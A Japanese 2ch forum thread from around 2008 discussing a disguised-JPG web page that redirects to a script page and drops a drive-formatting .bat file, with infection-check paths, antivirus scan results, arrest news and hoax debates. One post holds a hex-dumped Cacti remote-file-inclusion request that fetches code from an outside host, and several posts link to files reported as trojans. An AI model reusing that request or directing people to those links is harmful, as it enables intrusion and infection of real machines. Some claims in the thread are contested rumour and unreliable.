これがフォーマットウィルスですか？
駆除前に送信したメールで、受信者に感染しますか？
ご存知の方教えて下さい、お願いします。　

する可能性は大

相手に損害が出たら訴えられます

>>650
いい加減にしろ。何度言ったら分かるんだ。

>>651
感染しないと言う事ですね。
ありがとうございます。

とにかくスタートアップになければ感染してないってことでいいの？

>>653
犯人特定の定義ファイルを作ればいい

open janeも感染する？

>>654
スタートアップになくても感染してる事例があるってこと？

570 名前：名無しさん＠八周年[] 投稿日：2007/12/31(月) 07:34:28 ID:UpN/oKQ90
>>562
感染確認
心配な人、↓にbatファイルが無ければおｋ

スタートアップ
Windows 9x/Me
C:\WINDOWS\All Users\ｽﾀｰﾄ ﾒﾆｭｰ\ﾌﾟﾛｸﾞﾗﾑ\ｽﾀｰﾄｱｯﾌﾟ\BugFix[ランダムな数値].txt(空白).bat
Windows NT/2000
C:\WINNT\Profiles\All Users\スタートメニュー\プログラム\スタートアップ\IE_Up[ランダムな数値].txt(空白).bat
Windows XP
C:\Documents and Settings\All Users\スタート メニュー\プログラム\スタートアップ\WinUpd[ランダムな数値].txt(空白).bat

AUTOEXEC.BAT
Windows 9x
C:\AUTOEXEC.BAT .txt
Windows XP
C:\WINDOWS\SYSTEM32\AUTOEXEC.NT .txt

クイック起動
Windows 9x
C:\WINDOWS\Application Data\Microsoft\Internet Explorer\Quick Launch\AntiVirus[ランダムな数値].txt(空白).bat
Windows 2000/XP
C:\Documents and Settings\All Users\Application Data\Microsoft\Internet Explorer\Quick Launch\SecurityAlert[ランダムな数値].txt(空白).bat

ttp://www13.atwiki.jp/burakura_hdd/pages/16.html

少し手を加えるだけで各社ともパターンは素通りしますね。ごくろうさん。

基本的なことだけれど
必要な時以外JAVAとか切っとく癖を付けるのが大事ですな

http://so.7walker.net/guide.php
より抜粋

１．偽装JPGが表示され、スクリプトが組まれたページへリダイレクト。
２．動画再生ボタンをクリックするとスクリプトが発動。
３．telnetストームをはじめとする複合的なブラクラで各種アプリケーションソフト（メディアプレイヤー、メールソフト、スカイプなど）を起動させる。
４．ユーザーがパニくってるところでbatファイル？を間違って実行させる。
５．再起動させると、HDDあぼーん。

別物？

MySpaceやExcite.comなどの大手サイトに、マルウェアをインストールさせるバナー広告が表示されていたという。
2008年01月08日 13時05分 更新
　米MySpaceなどの大手サイトに、マルウェアをインストールさせるバナー広告が混入していたと、セキュリティ企業のTrend Microがブログで報告した。
　Trend Microが報道を引用して伝えたところでは、悪質バナー広告はMySpaceのほか、検索ポータルサイトのExcite.comや、ドイツのBlickというサイトでも見つかったという。
　MySpaceは人気便乗を狙ったマルウェアの標的になっており、11月にも、ユーザーを悪質サイトにリダイレクトするコードが仕掛けられる事件が起きている
　こうしたケースではシステムの脆弱性が悪用されることも多く、ユーザーはOSだけでなく、サードパーティーのソフトも常にセキュリティアップデートをインストールしておく必要があると、Trend Microは忠告している。

9999999なら知ってる

正月帰ったら実家の家族用パソコンがやられとった。
どうやら弟が踏んだらしい。

２年前に死んだ犬の写真と、
母親の友人たちとの旅行の写真が消えてしまったと
両親がたいそう落ち込んでた・・・
弟も弟で親と大喧嘩して、家は年始早々
あまりいい雰囲気じゃなかった・























とか書けば満足ですか犯人さんｗｗ

＾＾

>648
> ttp://internet.watch.impress.co.jp/cda/news/2008/01/07/18052.html
> シマンテックとトレンドマイクロに確認したところ、両社ともこの問題について対応を進めており〜

↑
結局はその場限りの――つまり極めてユニークなファイルにしか対応しないという
両社および MS の頭の良さは、過去の例からしてもわかりますね。
つまりこれ、もう少なくとも4年以上も根本的な対応を放置しているということです。
↓

ttp://gunkanmaki.jog.buttobi.net/MiniReport20040313.html

> yahooでの話ですが、amilala-exploitは、複数のモジュールの組み合わせによって
> 実行内容も毎回変るようです。各スクリプトの記述もどんどん更新され
> (PHPやASPで動的ランダム乱数付き出力のものもあったと思う)、
> ウィルスベンダーやフィルタリングが過去のものに対応しても、
> 最新のものには指紋とパターンマッチしないということになります。

ttp://oshiete1.goo.ne.jp/qa770340.html
ttp://www.geocities.co.jp/Playtown-Bishop/7102/taisaku/flatalk4.html#562
04/02/09

> トレンドマイクロが、アミララについて回答した
> winupdateはまめに。VBでは対応しかねます。

マルウェアをインストールさせる手法は、
過去に修正されたと思われている脆弱性を組み合わせて利用しているのが多いですね。
まあそれ以前に、パッチを当てていない人もいまだにいるということもありますが。

そして修正済だとされる脆弱性が本当に修正されているのかどうか、
つまりある条件のもとでは Unpatched になるのではないかと、
検証してみる気はないんでしょうかね。愉快なものがけっこう残っているものですよ。

0000 00 0c 29 f3 5b 69 00 0d 48 1f 0c 56 08 00 45 00 ..).[i..H..V..E.
0010 01 4e ea e8 40 00 30 06 33 14 41 cb 86 64 cb 57 [email protected]
0020 98 26 d2 5f 00 50 38 a2 44 ed 9b d4 88 b2 80 18 .&._.P8.D.......
0030 16 d0 a3 79 00 00 01 01 08 0a df 5b ae a3 00 00 ...y.......[....
0040 00 00 47 45 54 20 2f 63 61 63 74 69 2f 69 6e 63 ..GET /cacti/inc
0050 6c 75 64 65 2f 63 6f 6e 66 69 67 5f 73 65 74 74 lude/config_sett
0060 69 6e 67 73 2e 70 68 70 3f 63 6f 6e 66 69 67 5b ings.php?config[
0070 69 6e 63 6c 75 64 65 5f 70 61 74 68 5d 3d 68 74 include_path]=ht
0080 74 70 3a 2f 2f 77 77 77 2e 67 65 6f 63 69 74 69 tp://www.geociti
0090 65 73 2e 63 6f 6d 2f 74 72 75 73 74 6f 70 74 2f es.com/trustopt/
00a0 74 2e 74 78 74 3f 20 48 54 54 50 2f 31 2e 31 0d t.txt? HTTP/1.1.
00b0 0a 41 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 41 63 .Accept: */*..Ac
00c0 63 65 70 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 cept-Language: e
00d0 6e 2d 75 73 0d 0a 41 63 63 65 70 74 2d 45 6e 63 n-us..Accept-Enc
00e0 6f 64 69 6e 67 3a 20 67 7a 69 70 2c 20 64 65 66 oding: gzip, def
00f0 6c 61 74 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 late..User-Agent
0100 3a 20 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 : Mozilla/4.0 (c
0110 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 20 ompatible; MSIE
0120 36 2e 30 3b 20 57 69 6e 64 6f 77 73 20 39 38 29 6.0; Windows 98)
0130 0d 0a 48 6f 73 74 3a 20 32 30 33 2e 38 37 2e 31 ..Host: 203.87.1
0140 35 32 2e 33 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 52.38..Connectio
0150 6e 3a 20 43 6c 6f 73 65 0d 0a 0d 0a n: Close

>>668
これ何？

バイナリのコピペだろ

https://www.ccc.go.jp/

そうナリ

これで消えた人ってほんとにいるの

全部ネタだよ。まとめとかも含めてただの釣り。
複数の回線とPCで、あらかじめ作っておいたシナリオのレスで自演してるだけ。
昔で言うクラッシュミーみたいなのとか、ストレンジワールドみたいなものなら問題だが、
こんなただ転送されるだけでブラクラでもなんでもない代物で祭りになるわけないだろが。

>>674
実際に消えたわけだが。
VirtualBox上でだがな。

正月休みが明けて数日経ったわけだが
フォーマットされて仕事ができなくなったという話を聞かないな
やっぱりネタだったの？

踏むとどうなるか明記されていた上に対処法だっていち早く公開されてWikiまでできてたからな。
公開された対処法も講じずに敢えて踏む馬鹿もそんなにいないだろ。

>>676
windows update すれば？今日公開されてるよ。

フォーマットされたら
2chの専用スレを探して書き込みしているどころじゃない気がするが・・・

初心者ならパソコンが壊れたと勘違いするだろうしね。

>>572を踏んじまったのだが
再起動してもHDDは消えていない

Trojan.HTML.Agent.bというのはどこにあるのだろう
駆除しようにも場所がわかりません

カスペルのオンラインスキャンでも何も出んし・・・

残ってるのはこのスレだけか

今更ニコニコ動画の感染動画見たが検出したらブラクラ発動しても問題ないんだな（動画はブラクラ発動する前にAVGで検出してた）

もうネタだって気付けｗ　jpg偽装なんてもう前世紀からあるんだしｗ
アドレスはころころ変わるかもしれんが、実質何年も前から存在してるしｗ

ホントにウィルスや脆弱性だったら、セキュリティソフト会社もマイクロソフトも
いくらなんでも４年以上放置せんてｗ

スレ乱立→ネタ化→年末年始向け祭り　（超わかりやすい）

こんなブラクラにすらなってないただのグロ系が、急に注目されるわけがないｗ

なぜネタにしたがる？

ネタだというわかりやすい証拠を・・

・２ちゃんでのみ話題　（←あとはこれを見たブロガや記者がネタにしているくらい）
・古典的ブラクラ（鑑定スレテンプレに既出）が、なぜか急に出現したことになってる
・何より確かなのは、踏んでも無事だというこの事実（グロではあるかもしれませんが）
　（これが本当なら、被害者続出でかなりまえから世界中で話題になっているはずですよね）

>>685
>>648のリンク先見てみろ

>>684
名前だけで実は全く対策できないソフトウェアを売ってる会社の人じゃね？
バレたら困るんでしょ、いろいろと

貼りまくってたバカがネタ化しようとして必死なんだろｗ

ネタだというもっと具体的な証拠をひとつ

ttp://sakura03.bbspink.com/test/read.cgi/ascii2d/1198642072/l50
↑の 269 に例の偽装ファイルと（たぶん）同じものが貼られてあるようですよ。
踏んでも特に変わったことは起きないようです。つまり無害（笑）

★けれど、もちろん各自踏むのは自己責任で（笑）

>>689
これは亜種だと思うが。
で、JavaScriptの飛び先が何らかの理由で404になってるみたい。
飛び先の内容によっては有害”だった”かもしれないよ。
どこに飛ぶのかはちょっとソースが暗号化されてるっぽいから今はわからん。

>>661より
＞１．偽装JPGが表示され、スクリプトが組まれたページへリダイレクト。
＞２．動画再生ボタンをクリックするとスクリプトが発動。 (以下ry

↑なんにしても、リダイレクトされた時点で、その偽装JPGは無関係。
その後に起こることは、全てリダイレクトされた別ページ上。
転送するのに何も偽装JPGである必然性もない。HTML上で転送されるかもしれない。

スレタイみたいに「踏むとフォーマットされるヤバイ画像」ってのは間違った認識。
せいぜい「（環境によっては）踏むと有害かもしれないページに
リダイレクトされる画像（に見えるが実はHTML+JavaScript）」ってとこ。

でもそんなタイトルじゃインパクトに欠ける／踏むとフォーマットの方が恐怖感がある
　　　　↓
祭り騒ぎにしたい＝要するにネタ

今頃何言ってるの？って感じだけどな…
そこらの説明や認識は、このスレ初期でとっくに済んでるじゃん
対応済みだと主張していた某信者のおかげでさ

NO・・・あれ、誰か来たみたい。ともあれ>>691は正しい認識ではある。
ただ初心者に対しては、そう書いた方が気をつけるしわかりやすいでしょ。
別に祭りにすらなってない。注意喚起してただけで、各社対応が終わった段階で
スレが消えるのは当然。だがなぜそれが>>692という結論なのか、論理的に破綻している。
ただネタだという結論からして、それに枝葉を付けているだけじゃないか。

(。∇゜)б

踏んだら至る所に南京、法輪って書き込むほうが面白いのに
中華で踏んだら即逮捕で相当笑えそう

既にbatを落とさせるサイトそのものがなくなってるのに亜種もなにもないだろｗ
馬鹿じゃないのか

ﾊｧ？なくなってないが。

　　　　　／＼⌒ヽﾍﾟﾀﾝ
　　　／　 ／⌒)ﾉ ﾍﾟﾀﾝ
　 ∧＿∧ ＼ （(　∧＿∧
　（； ´Д｀））'　））（・∀・ ；） 　もちつけ
　/　　⌒ノ　（ ⌒ヽ⊂⌒ヽ
.（O　　 ﾉ　)￣￣￣(）__ 　 ）
　）_）＿）　（;;;;;;;;;;;;;;;;;;;）（＿（

このスレ終わっちゃったの？

　 　＿＿＿.　　　　　　　 　 　 　 　 　 　　 ∩゛ 　　　　∧空∧　　　　（（（　））） ／＼
　　/. ――┤.　-=・=-　　　　-=・=-　　　　| |　 ∧ ∧｛´ ◎ `｝__＿＿（　´∀｀）＼ う ＼
　./(. 　= ,= | 　　　　 ∧∧　　　 ∧＿∧　 | |　( ´ー｀) ）:::／´∀｀ ;:::: ＼ヽ(`Д´)ﾉ゛＼ ま＼
　|||＼┏┓/∫ 　　　(=ﾟωﾟ)ノ~　（　´Д｀）／/　　＼　< .∧|∧　　　/::::::::::| .¶＿¶.　　　 ＼い＼
　V/　∧,,∧ ∬ 　〜（　　x） 　／ 　 　 　 /　　　,一-、(´ー｀)　　/:::::|::::::| (ΦдΦ)／~　　　＼棒＼
　 ||　ミ,,ﾟДﾟノ,っ━~~　U U 　 / /|　　　　/　　　/￣　l⊂ヽ　＼/|:::::::::|::::::| 　γ＿＿　　∧w∧ 旦∬
　人 ﾐ ,,,　 ~,,,ﾉ　　.ｎ　　THANK YOU　2ｃｈ　■■-っ ┌───────┐　　＼ （ ﾟДﾟ　）∩゛
( ﾟーﾟ)と..ﾐ,,,/~),ヽ（凸）ﾉ~　　　　　and..　　　　 ´∀｀/.　｜ ●　　　 　 　 ●　| 　　　　ヽ 　　　ノ
　　／￣￣し'J＼［Y］ GOOD-BYE ２ｃｈ WORLD！ ／|　.┌▽▽▽▽┐.　|____|__||_| ））
　/　　　　 ●　　●､ヽ　　　　　　　　　　　 　 　　 　（.　┤ .｜　 　 　 　 ｜.　|□━□ ）　(ﾟДﾟ)?
　|Y　　Y　　　　　　　＼　　またどこかで会おうね..　＼.　 └△△△△┘.　|　 J　　|）∧＿∧
　|.| 　 ｜　　　 　 　.▼ |∀ﾟ)　　　　　　　　　　　　　　　｜＼あ＼　　　　　　 |　∀　ﾉ　" ,　 、　ﾐ
　| ＼ ／■＼　 ＿人　|∧∧∩゛∧＿∧∩゛∧＿∧　　| 　 ＼り.＼　　　　　| - Å′　ゝ∀　く
　|　　（　´∀｀）_＿＿／( ﾟДﾟ.)'/ （ ´∀｀ ）/ （・∀・　）,.　|.　　　 ＼が＼.　 　 |　 ）. ＼　 Λ＿Λ
　＼　（ Ｏ 　 ）　　冫、 U　　/　 （　　 　 / ⊂　　⊂.）ヽ(´ー｀)ﾉ゛　＼と.. ∧_∧/(´Д｀;)<丶｀∀´>
　　｜││ │ 　 `　　 |　　 | 　　∪　|　 |　　（　（　（　　(　 へ (ﾟдﾟ)〜⌒(ﾟーﾟ*) (-＿-) (･ω･` )
　　（_（__（＿_）（・∀・） ∪~∪　　（＿（＿_）　（＿（＿）　く ⊂⌒~⊃｡Д｡）⊃⊃⊃（∩∩）（∩ ∩）

このスレはここまでです。ご愛顧ありがとうございました

A-Squared 3.0.0.126 1230.htm Trojan-Downloader.JS.Agent.aqr
Arcavir 1.0.5 1230.htm Trojan.Downloader.Js.Agent.Aqr
avast! 3.0.1 1230.htm Clean
AVG Anti Virus 7.5.50 1230.htm Small.2.BJ
Avira AntiVir 2.1.11-47 1230.htm TR/Dldr.Agent.aqr.20
BitDefender 7.60825 1230.htm Clean
CA eTrust N/A 1230.htm Clean
CAT QuickHeal 9.00 1230.htm Clean
ClamAV 0.91.2 1230.htm Clean
CPSecure 1.14 1230.htm Troj.Downloader.JS.Agent.aqr
Dr. Web 4.44.0.10150 1230.htm Clean
F-PROT 4.6.8 1230.htm JS/Agent.CW
F-PROT 6 6.2.1 1230.htm JS/Agent.CW
F-Secure 1.10 1230.htm JS/Agent.CW [Libra]
Kaspersky 5.7.13 1230.htm Trojan-Downloader.JS.Agent.aqr
McAfee Virusscan 5.20.0 1230.htm Clean
NOD32 2.70.6 1230.htm Clean
Norman Virus Control 5.70.01 1230.htm JS/Agent.C
Panda 9.04.03.0001 1230.htm Trj/Agent.HQI
Sophos Sweep 4.25.0 1230.htm Clean
Trend Micro N/A 1230.htm JS_DLOADER.ZX
VBA32 3.12.2.5 1230.htm Clean
VirusBuster 2005 1.3.4 1230.htm Clean

http://scanner.virus.org/vscan

>>700
http://www.vippers.org/img/uho2255.jpg
＼(^o^)／ｵﾜﾀ

>>703
開けないんだが

残ってるのはここだけか

>>703
※このアドレスは危険URLのひとつです。
注意！アラートオープンを発見！ (2)
注意！ループタグを発見！ (7)
注意！逃げウィンドウを発見！ (4)
危険！mailtoストームを発見！ (100)
危険！無限ループを発見！ (4)
危険！ニュースストームを発見！ (12)
危険！Telnetストームを発見！ (198)
ブラクラチェックが終了しました。

まだやってんの

　　　　　 ？？？？？？？？？
　　　　？？？　？？？？ 　？？？　　　 　？？？
　　？？？？？？？？？？？？？■　　　　 ？　？？
　？？　？？■？？？■？？？？？？　　　？？？？
　 ？？？？？　　　　　？？？　　？？　　　　 ？
　？？？？　？　　 ■　　？？？？？？　　　？？ バカにはコピペできないポンデライオン
？？　？？？？？？？　　 　？？？？■？？？？？
？？？？？？　　　　　？？？？？？？　　▼
？？？？？？？？？？？？？？ 　　？？　 　？
　　 ？？　？？？？　 ？？？？？■？ ？？？
　　　？？？？？？？？？？■？？？？▼　？
　　　 　？？　 ？？？■？？　 ？ 　 ？　 ？
　　　　　　　　 ？？？？ 　？　 ？ 　？？？？

ｊｐｇ偽造てｗｗｗこんなのブラグラじゃねーよｗｗｗｗ
ジャバとか知らなさ杉ｗｗ
しょぼ杉！こんなんでスレたてんなよバカｗｗｗ
クラシュミーとかストレンジとかもっとスゲー凶悪なのあるぜ
出なおして来いｗｗｗ

　　　　　　 彡川川川三三三ﾐ〜
　　　　　　川|川　／　臭　＼|〜
　　　　　　川川　　◎---◎｜〜　
　　　　　　川川　　　　　3　　ヽ〜
　　　　　　川川　　∴）　A（∴）〜 　
　　　　　　川川　　　　　Ｕ　 /〜　　　　 ＿＿＿
　　　 ＿;川川　　　　 ﾀﾞｯﾗ〜　　　.　 　 |　 |　　 |＼＿
　　／　　川川　　　＿＿／　 　　　　　 . |　 |　　 |　| 　|＼
　/　　　　／　　　　 |　|　 　 　 　 　 　 　 |　 |　　 |　| 　|::::|
（　　　　（　　　◎　 /　＼＿ 　 　 　 　 　.|　 |　　 |　|　 |::::|
　＼　　　＼　　　／＼　　　￣￣＼ 　 　 |　 |　　 |　|　 |::::|
　 /:＼　　　＼　　ﾄﾞﾋﾟｭ￣＼っ））））〜〜|　 |　　 |　|　 |::::|
　/:::　 ＼　　　　つ＿__　　|￣￣￣￣￣￣￣￣￣￣￣￣|
　|:::　　　 ＼　　 （＿＿3｡ ;｡￣￣ |　 ＿＿＿＿＿＿＿__ .|
　|::::　　　　 ＼＿＿/　 　 　 　 　 .|　|　　　 　 　 　 　 　. |.|
　＼:::　　　　（;;;　）;; ）　 　 　 　 　 |　| 　 　 　 　　　　. 　 |.|
　　 ＼　　　　　　＼＼　　　　　 　.|　|　　　　　　　　　　　|.|
　　　　＼　　　　　　） ）　　　　　 . |　|　　　　　　　　　　　|.|
　　　　　/　　　　　/ /　　　　　 　 |　|　　　　　　　　　　　|.|
　　　　/　　　　　/ /　　　　　　 　 |　￣￣￣￣￣￣￣￣ |

JavaScriptだとか、画像だとか、なぜそのようなつまらないことにばかりに目を向けるのでしょう（笑）
ホントに愉快な人たちですね。wikiとかもウソばかり書いてあるし。
それからあと、Y売の記事書いた某は、救いようのないおバカさんのようですね（笑）
気付いていないのはあんたのほうなんですよ（笑）

あらら脳ミソまで感染されちゃったのか

（笑）

屹度某所で被爆したか、或いは其れを見てゐたお莫迦さんが弘めようと試みたのでせう。
いづれも某所のサービスを利用しない者には無關係の筈ですからね（笑）
數日前にフォーラムでも集計結果のレポートがありましたね。
其れを見てわかるのは、數年前の Microsoft Data Access Components の時からさうでしたが、
表面的な事象許りに氣を取られすぎてゐると云ふことです（笑）

ttp://www.itmedia.co.jp/news/articles/0801/17/news068.html

つまりエロ画像うｐしほーだい、管理してない奴が悪いてかｗｗｗ

エロ画像・動画へのリンク満載の２ちゃんねるはどうなのよｗ

執行猶予ワリカン

まあこれでだね、判例が出ましたよと
うｐした奴のほうが〜と反論しても、そんなのカンケーネーと一切無視されると
悪いのは管理人だと

あれじゃないですか。昔のエロ本ビニ本時代の摘発にしても、
見せしめでパクられるのは弱小出版と相場がきまっとりました

今回の件でいえば、たとえば同じ画像がアホーのジオの鯖に放置されていたとしても、
アホーのほうは見て見ぬふり。お上のケツの穴の大きさが測り知れますなぁ

そりゃ勝てるかどうか分からない相手に喧嘩を仕掛けるのはただの馬鹿だろw

マイクロソフトだけ対象にしなかったコントローラの接続方法特許訴訟厨と同じだな

ぬふう ＝3

　
コンピューターウイルス：作成者、配信者、計３人国内で逮捕　京都府警
ttp://mainichi.jp/select/today/news/20080124k0000e040051000c.html

ttp://www13.atwiki.jp/burakura_hdd/pages/12.html
まとめwikiを見たんだけど
未対応のアンチウィルスソフトってまだあるんだね

>>723
著作権法で無理やりってのが苦しいね。
作成の証拠だけでどうにかできりゃいいのに。

>>1もタイホされるの？

トレンドはこれには対応しないって、宣言したのにねぇｗｗｗ
他社が対応したからって、いまさら急に

>>727
マカフィーが泣くのでやめてください

>>725
そこにフォーマットされるウィルスを入れるとどんなウィルスなのかわからないので
最強なんじゃない？

『朝日新聞2』008年1月25日朝刊2面
「感染を防ぐ「4ヵ条」」より

（略）
> 万が一、感染した場合は「パソコンを初期化して基本ソフトの段階から
> 入れ直したほうが安全だ」と武田教授は話す。

>>723
ﾊﾞｶがまた一人この世から浄化出来てよかったな

でも、罰は軽いんだろうな…。
本当に日本は犯罪者に優しい気がするよ。
某国みたいに２００年位求刑しとけっつーの。

著作権法ですよ。よーするに別件。
そんなことがまかり通ることのほうがよーっぽど問題

626 名前：原田氏：2008/01/26(土) 04:04:52 ID:CmacN6be0
http://tmp.2chan.net/guro-gazou/src/1201269335707.jpg
http://stat.ameba.jp/user_images/23/f5/10035626786.jpg
http://www5.uploader.jp/user/tane/images/tane_uljp00237.jpg
http://blog.so-net.ne.jp/_images/blog/_031/gocky/5576052.jpg

しかしまあ、よくもこんなにｗ

>>734のtane_ulip踏んだらNOD32が反応した。
ってやっとパターン更新されたのかorz遅すぎるだろ常識的に考えて。
モジュール 対象 名前 ウイルス アクション ユーザ システム情報
IMON ファイル http://www5.uploader.jp/user/tane/images/tane_uljp00237.jpg ウイルスの可能性 : SCRIPT ウイルス

しまった、ログそのままコピペしたからURLが残ってるorz

いつもの拡張子偽装のファイルです。危険ですので踏まないで下さい。

いやああああああああ

>>735
さっき他板で踏んだけど、ｶｽﾍﾟがトロイの木馬ッスよｗｗって教えてくれた

あぶない、あぶない。

>>734
「電源切っても無意味だと言うことを知れｗ」

こんな優しさのあるメッセージを残してくれる奴だから
心底、悪い奴でもなさそうだな、中辻ってｗ

>>730 クリーンインストールが最善とはorz
負担掛かりますよね

武田教授もズバリ言ってあげればいいのに。ＰＣ買いなおせって。
ウイルス製作者の真意の程は解らないのだからさ。

>>741
外部への接続はVMwareの仮想マシンを使うんだよ。
VMwareの仮想マシンは定期的にスナップショットをとっておいて、
何か発見されたら、なにも出てこないポイントまでクリック一つでさかのぼれる。

>>743
危険な発言だな・・・

質問ですが、危険な発想の人はこの板の番頭さんですか？

　　　　　　　　 　 　 ／:::,. -／, -'―::ﾆニ｀＝ｰ- .._
　　　　　　　　　　 /:::／::::/／:::::／::::::::::, -‐''´::＞､｀ヽ
　　 　 　 　 　 　 /:::/::::::／:::::／::::::::::／:::::::::／::::::::::',::::ヽ
　　　　　　　　　/:::/::::::/ヽ::::/:::::::::／::::／／:::::::!:::::::|:',:::::ヽ
　　　　 　 　 　 !::::i::::::/､:::::Y:::::::::/:::::::/::/::::::::::::|::::::::|:::!:',::::',
　　　　　　　　 |:::::!:::::l::'､＼!::::::::/::::::/::/:::::::::::::/:::::::/:::!!::',::::',
　　　　　　　　 !::::|::::::|::::ヽ::!::::::/:/::/::/::::::::::::;ｨ:/::::/::::ハ::',::::!
　　 　 　 　 　 |:::|:|::::::!ヽ:::::|::::::|::!::ｨ:,ｲ:::;::::／//::::/!:/ 　 !!:!::|
　　 　 　 　 　 !:::!::!::::::',::, -|::::::!:|/ ﾘ∠ヱ_ノ/::／ ｿ-― l!::!::!　
　　　　　　　　|:::|:::!::l::::｀i ｀ﾞ!:::::|:!　ﾍ:ﾞｰ'ﾉ ｀;／ 　 rｲ:ｸ''ゝ!:!/　　
　　　　　　　　!:::|:::|::!::::::::'､く!::::ヾ　｀￣￣　　　　 i｀￣´/:/　　　 グダグダだな
　　　　　　 　 !:::|::::!:|:::::::::::ヽ|:::::|ヽ､ 　 　 　 　 　 丶　/ｲ　　　　　　
　　　 　 　 　 |:::|::::|:|!::::::::::::::|!:::::!　　　　　　　 　 ／ ,ｲ:::|
　　　 　 　 　 !:::l!:::|:|',:::::::::::::|',:::::ﾄ､　 　 　 -‐-‐　／ |:::::!
　　　 　 　 　 !:::!!:::',:!:ヽ:::::::::! ',::::!　丶､　 　 　 ／　　|:::::|
　　　 　 　 　 |:::||:::::',:::::ヽ:_/__ ',:::!　　　｀丶 ／　　　 |::::::!
　　　　　　　　!::! !:::,∠´---- ､',::ﾄ､　 　 /　　　　　　!:::::|
　　　　　　　　|::! Y｀`丶､￣￣｀:',:ﾄ､＼ /､､　　　　　 |:::::!
　　 　 　 　 　 !:! ,!: : : : : : ＼ : : :',:! ＼＼ヽヽ､　　 　 !::::!
　　　　　　　　,ヾ'-- ､ : : : : : ＼: :',:! : : ＼ヾ ',:＼　　 |::::!
　　　　 　 　 /: : : : : : ＼ : : : : : ヽ',:| : : : :ヽヽﾄ､: ヽ　 !::|
　　　　 　 ／: : : : : : : : : ヽ: : : : : : :',:! : : : : :ヽヽ',ヽ:ヽ !:|
　 　 　 ／ : : : : : : : : : : : : ヽ: : : : : :',:!ヽ: : : : : ヾ',ヽヽ:|::!

CD-ROMからブートするOSに感染しても、次回起動時にはきれいさっぱりなくなっている。
だから、まず、本体をCDブートし、HDDに格納された仮想マシンを日常は使う。
外部へのアクセスは、それぞれ専用の仮想マシンを使う。
あらかじめ危険と分かっているサイトへのアクセスは、
CDブートした仮想マシンを使うことで何の破壊活動もできなくすることが出来る。

と思う。

>>735
おや？
いつの間にかマカも対応してて隔離された

あぁ、これはだいぶ昔の奴なのか

大手ウイルスソフト会社が追いつかないウイルス対策を個人の利用者が、
ウイルスの情報をソフト会社に提供すると、ソフト会社が駆除可否を確認した上で、
ウイルス情報を個人から買い取るという新たなサービスを実施する会社が現れた。

この活気的なアイデアを考案した会社はハッドラーソフト株式会社
HadodoraiBugado:http://hadodoraibugado.com/soshi/index.php?
この会社はウイルスの情報により100ドル〜10000ドルで買い取っているという。

つまりウィルスは商材。
今後はウイルス情報を買い取らせるために、どんどん開発しろということですね？
昔から言われてるように、ウィルスはソフト会社が間接的に（ry

>>750
http://pc11.2ch.net/test/read.cgi/sec/1162464139/　に転送

仮想マシンでウイルスを完全に防げるの？

マイナー・Ｂ級・田舎ウィルスのとあるテスト結果

ttp://winnow.oitc.com/MalwarePerformanceGraphic.php?chart=detectionrate&size=20

ttp://virusinfo.info/images/vttesting/december_sum.PNG

一つの具体例：HDDをフォーマットするブラクラ
ttp://www13.atwiki.jp/burakura_hdd/pages/12.html

>>753
防げるわけないだろｗ
汚染されてもすぐ復旧できるっていうだけ

NOD32がどれかに対応したっぽい
2837(20080130)でprobably a variant of JS/TrojanDownloader.Agentと検出されます
ほんと今更だけど報告だけ

>>735
ノートン2008でなんか警告かなんか出たけど、
一瞬、DL画面のプログレスバーが見えたのが気になるｗｗｗｗ

オレ大丈夫なの；；；　batは無いし。フツーのautoexecも書き換えられてないし・・
レジストリのrunにもなんもないし。よーし再起動してくるｗｗｗ

全然普通に生還ｗｗｗ

>756
ttp://pc11.2ch.net/test/read.cgi/sec/1198165180/543-550

怒ってる人がいたけど、今さら対応されても、ってところかなｗ
やらないよりはマシだろうけど。

HDDフォーマットのウイルス自体はありきたりな2〜3年前のウイルスなのでNODでもハナから対応できますよ

問題はダウンローダーの対応が糞遅かった

HDDフォーマットはウィルスでもなんでもない
タダのbatファイルだし

結局この騒ぎってなんだったん？

フォーマットされた奴が入れてたアンチウイルスソフトが知りたいな

３０日の深夜に出たという話だったから
年末の段階で対応できてなかったソフトじゃないか？
今はもう殆どのベンダーが対応してるよ。

>>764
まとめとかで問題にしてるのはダウンローダーのだけでしょ

フォーマットまでされたってのはよっぽどのソフトだろう

つーかなんでこんな懐かしいブツを、今更わざわざほじくりかえしきたんだか謎。

>>766
アンチウイルスで駆除できる在り来たりなウイルスを踏ませて
セキュリティソフトを導入させようとするＰＣ安全協会ｗの仕業だろ

ＰＣ安全協会会員の中にもソフトの導入や買わせるなどの活動とは別に
無差別に他人のＰＣを壊滅させることに喜びを感じる
キチガイが存在するから警戒がいるな

＞３０日の深夜に出た
っていつの３０日よｗ
これヤフージャパンのプロフで使われてたの２００４年の話よ？
その後の数年間ずっと未対応だったとしたら、相当の糞ベンダーどもだよ

>>768
一応報道じゃあ2007年の12月30日となってるみたいだが。。。。
>2004年の話
それってフォーマットするDATの話？
それともDownloaderのこと？
記事ではDownloaderの事言ってるみたいだけど、
スレと読み合わせると良くわからんのよね。

▼ 1. 2004年3月時点での AmiLaLa 情報記事
http://gunkanmaki.jog.buttobi.net/MiniReport20040313.html

▼ 2. 2005年1月時点での AmiLaLa 情報記事（文字化け時：エンコードは Shift-JIS）
http://web.archive.org/web/www1.bbweb-arena.com/lefty/blog258_017905.htm

AmiLaLa が各板の鑑定スレに依頼が出され始めたのが、2004年の1月くらいです。

当時ヤフープロフィールにはスクリプトを仕込むことができたので、
今回とほぼ同内容（引数やファイル名などが異なる）のバッチファイルのダウンロード、
またはADODB や MDAC などを利用したローカルファイルの削除・上書き・作成、
また同時に Cookie 値を渡しながらのブラクラへの転送などが行われていました。

Downloader を仮に AmiLaLa 本体（機能はバッチファイルのダウンロードに限らない）
を呼んだり誘導したりするものとすれば、上記リンクを見ればわかるように、
2004年当時から多種の URL で存在し、それらはみなすぐに消えてます。

昨年12月には30日以前にも多種の URL で鑑定依頼が出され、
上記のように前月11月にも出されてます（これらのファイル群はおそらくすべて消滅）。

従って同様にすぐに消えた「1230.jpg」だけが特別視された理由がわかりません。
（ちなみに AmiLaLa を呼ぶものは画像に限らず、リンク記事にもあるように
html、mhml、xml、exe、swf 形式などもあります。）

http://pc11.2ch.net/test/read.cgi/sec/1162884659/962
> 962 ：名無しさん＠お腹いっぱい。：2007/12/10(月) 18:18:12
